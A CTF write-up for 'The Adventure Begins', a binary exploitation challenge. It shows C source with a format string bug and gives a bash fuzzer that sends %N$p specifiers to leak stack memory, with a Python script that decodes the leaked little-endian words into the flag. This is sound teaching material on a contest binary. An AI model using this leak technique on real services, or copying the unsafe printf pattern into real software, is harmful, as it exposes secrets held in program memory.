Decode-E-Cyber CTF 2023 — PWN/Binary Exploitation Writeup — 1

Febin
Nov 6, 2023

I participated in Decode-E-Cyber CTF 2023, conducted by OWASP VIT Bhopal, and we were the winners: Team Pegasus, with 1350 points. We solved many challenges and took first place, and I was the only one who solved the PWN / Binary Exploitation challenges in the event.

This is the writeup for the Binary Exploitation Challenges.

Challenge — 1: The Adventure Begins

Difficulty: Easy

The challenge provided the source code of the binary and a dummy flag; the compiled binary itself was not provided.

Let’s have a look at the source code.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

char *greetings[] = {
    "Can't believe you made it!!",
    "You have got that fire in you today!",
    "You're here! Let's have some fun!",
    "Ready to embark on an exciting journey?",
    "Buckle up, it's going to be a wild ride!",
    "You're about to enter a world of adventure.",
    "Get ready for an amazing experience!",
    "Welcome, let's get this party started!",
    "Exciting times await, welcome aboard!",
    "Your adventure begins now!",
    "Step into the world of possibilities.",
    "Join the fun and enjoy the ride!",
    "The journey begins with you!",
    "Prepare for a fantastic experience.",
    "Welcome to the world of endless possibilities.",
    "The stage is yours, shine bright!",
    "Time to shine and have some fun!",
    "Embrace the adventure that lies ahead.",
    "You're in for a treat!",
    "The fun starts now!",
};

int main() {

    setvbuf(stdin, NULL, 2, 0);   // 2 == _IONBF: unbuffered I/O
    setvbuf(stdout, NULL, 2, 0);

    // Read the contents of the "flag.txt" file into a buffer
    FILE *file = fopen("flag.txt", "r");
    if (file == NULL) {
        perror("Error opening file. Perhaps there is no such file as flag.txt in the current directory.\n");
        return 1;
    }

    char buffer[100];   // the flag stays in main's stack frame for the rest of the run
    if (fgets(buffer, sizeof(buffer), file) == NULL) {
        perror("Error reading file\n");
        fclose(file);
        return 1;
    }

    fclose(file);

    // Initialize random number generator
    srand(time(0));

    char userName[9];
    for (int i = 0; i < 7; i++) {

        printf("Enter your name: ");
        fgets(userName, sizeof(userName), stdin);
        userName[strcspn(userName, "\n")] = '\0';
        int randomIndex = rand() % (sizeof(greetings) / sizeof(greetings[0]));

        char message[200];
        snprintf(message, sizeof(message), "Welcome %s! %s\n", userName, greetings[randomIndex]);

        printf(message);   // user-controlled data used as the format string

    }

    return 0;
}
```

Looking at the code, the program reads flag.txt into a stack buffer, takes a name from the user, builds a welcome message containing that input, and prints the message using printf().

Notice how the message is supplied to printf: it is passed as the first argument, i.e. as the format string itself, rather than through a fixed "%s" format. So there should be a Format String Vulnerability.

Let’s compile it and run the program.

Yes, it is! The Format String / memory leak vulnerability is confirmed. That means we can leak the flag, which is already in the program’s memory.

For that, we need to know the correct offset that leaks the flag. To read different stack slots we can use the positional %[number]$x or %[number]$p format specifiers. I am going to fuzz through all numbers between 1 and 600 to find the one that leaks the flag’s characters.

```bash
#!/bin/bash
# Feed every positional specifier %N$p to the binary, prefixed with N so the
# leaked word can be matched back to its index later.

for i in $(seq 0 600)
do
    printf '%s ==>> ' "$i"
    echo "%${i}\$p" | ./chall
    # echo "%${i}\$p"   # uncomment instead to only print the specifiers
done
```

We already know that the flag starts with “OWASP{”, so while running the fuzzer we can filter the output to show only the leak that contains “OWASP” as hex. We can use Python to find the hex values of O, W, A, S and P.

O => 0x4f
W => 0x57
A => 0x41

We can now grep for 41574f to find the right number.

Note: I use 41574f (AWO) instead of 4f5741 (OWA) because the leaked values are printed as little-endian integers, so the bytes of each 8-byte word appear in reverse order.

Cool! The right number is 34 (%34$p): it leaks one part of the flag, 8 bytes (characters) of the dummy flag. To leak the entire flag, we can keep going from 34 up to 39 or 40, one 8-byte word per index.

Okay, let’s check that on the target server and try to leak the original flag.

Again we can use Python to decode each hex value to bytes and then reverse every 8-byte chunk to get the flag.
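The grep and decode steps above, as an added Python example that is not part of the original writeup: `recover_flag()` parses the fuzzer’s “N ==>> Welcome 0x…!” lines, locates the word whose little-endian hex ends in 41574f, and unpacks that word and the following ones back into memory order. `simulate_leaks()` is a hypothetical helper that fabricates such lines from a constructed dummy flag so the script runs offline; the output format it mimics is the one the challenge binary prints.

```python
import re
import struct
from typing import Dict, Iterable, List, Optional

# Constructed sample data, not the real challenge flag.
SAMPLE_FLAG = b"OWASP{dummy_flag_for_demo}\n"

def little_endian_hex(prefix: bytes) -> str:
    """Hex of `prefix` with its bytes reversed, as it shows up in a leaked word (b"OWA" -> "41574f")."""
    return prefix[::-1].hex()

def simulate_leaks(flag: bytes, first_index: int = 34) -> List[str]:
    """Hypothetical helper: the lines the bash fuzzer would print for the stack words
    holding `flag`, shown the way glibc's %p prints them (no leading zeros, '(nil)' for 0)."""
    padded = flag.ljust(-(-len(flag) // 8) * 8, b"\x00")
    lines = []
    for n in range(0, len(padded), 8):
        (word,) = struct.unpack("<Q", padded[n:n + 8])
        shown = "(nil)" if word == 0 else hex(word)
        lines.append(f"{first_index + n // 8} ==>> Welcome {shown}! Your adventure begins now!")
    return lines

LEAK_RE = re.compile(r"^(\d+) ==>> Welcome (0x[0-9a-f]+|\(nil\))!")

def word_to_bytes(token: str) -> bytes:
    """Undo the little-endian display: 0x75647b505341574f -> b'OWASP{du'."""
    value = 0 if token == "(nil)" else int(token, 16)
    return struct.pack("<Q", value)

def recover_flag(lines: Iterable[str], count: int = 6) -> Optional[bytes]:
    """Parse fuzzer output, find the index holding 'OWA' (the grep step), and stitch
    that word plus the next `count - 1` words back into the flag."""
    leaks: Dict[int, str] = {}
    for line in lines:
        m = LEAK_RE.match(line)
        if m:
            leaks[int(m.group(1))] = m.group(2)
    needle = little_endian_hex(b"OWA")
    start = next((i for i in sorted(leaks) if needle in leaks[i]), None)
    if start is None:
        return None
    raw = b"".join(word_to_bytes(leaks[i]) for i in range(start, start + count) if i in leaks)
    raw = raw[raw.find(b"OWA"):]              # tolerate a flag that is not word-aligned
    return raw.split(b"\x00", 1)[0].rstrip(b"\n")

if __name__ == "__main__":
    print(recover_flag(simulate_leaks(SAMPLE_FLAG)))
```

Against real fuzzer output, pass the captured lines to `recover_flag()` directly instead of the simulated ones.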

Voila! We got the entire Flag via memory leak!

Thanks! Hope you learned something.

I will publish the part-2 soon.

Happy Hacking!
